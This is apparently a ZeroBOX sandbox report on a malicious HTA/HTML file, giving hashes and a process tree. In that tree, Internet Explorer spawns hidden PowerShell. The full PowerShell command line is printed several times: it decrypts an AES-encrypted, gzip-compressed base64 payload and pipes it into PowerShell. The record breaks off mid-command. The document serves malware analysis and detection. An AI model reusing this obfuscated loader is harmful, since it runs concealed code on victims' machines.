Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 25, 2023, 10:35 a.m.	July 25, 2023, 10:37 a.m.

Size	1.2MB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`2aa4741c22f4f7e9f7fb2318e974649c`
SHA256	`069ac184f80baa3ced862d6704254d57990699bda965a9bcc2a89b2d8b61c123`
CRC32	`37A3E870`
ssdeep	`3072:XMyG1hNUveUzpkVDbffRhyTcVWRda4Ynq/gQ:XMJvzU6xffrMckdabq/gQ`
Yara	None matched

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\HHYGASDBBBX.hta.html
3060
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3060 CREDAT:145409
  2228
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell - }
    756
    - cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 16);$VghnqU.Dispose();$evOYiUt = New-Object System.IO.MemoryStream( , $BIWUhQeeo );$bAepga = New-Object System.IO.MemoryStream;$fWpRphkAG = New-Object System.IO.Compression.GzipStream $evOYiUt, ([IO.Compression.CompressionMode]::Decompress);$fWpRphkAG.CopyTo( $bAepga );$fWpRphkAG.Close();$evOYiUt.Close();[byte[]] $OGFff = $bAepga.ToArray();$TAeJVf = [System.Text.Encoding]::UTF8.GetString($OGFff);$TAeJVf | powershell -
      2780
      - powershell.exe powershell.exe $YmgBp = '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';$OdGbsbH = 'VmJBb0VkZHNwUVlVZ3JHaHRhaXF4SndsZ3JmdnFXaXI=';$VghnqU = New-Object 'System.Security.Cryptography.AesManaged';$VghnqU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$VghnqU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$VghnqU.BlockSize = 128;$VghnqU.KeySize = 256;$VghnqU.Key = [System.Convert]::FromBase64String($OdGbsbH);$bVTEv = [System.Convert]::FromBase64String($YmgBp);$MZAJNxgv = $bVTEv[0..15];$VghnqU.IV = $MZAJNxgv;$mcclLAtOb = $VghnqU.CreateDecryptor();$BIWUhQeeo = $mcclLAtOb.TransformFinalBlock($bVTEv, 16, $bVTEv.Length - 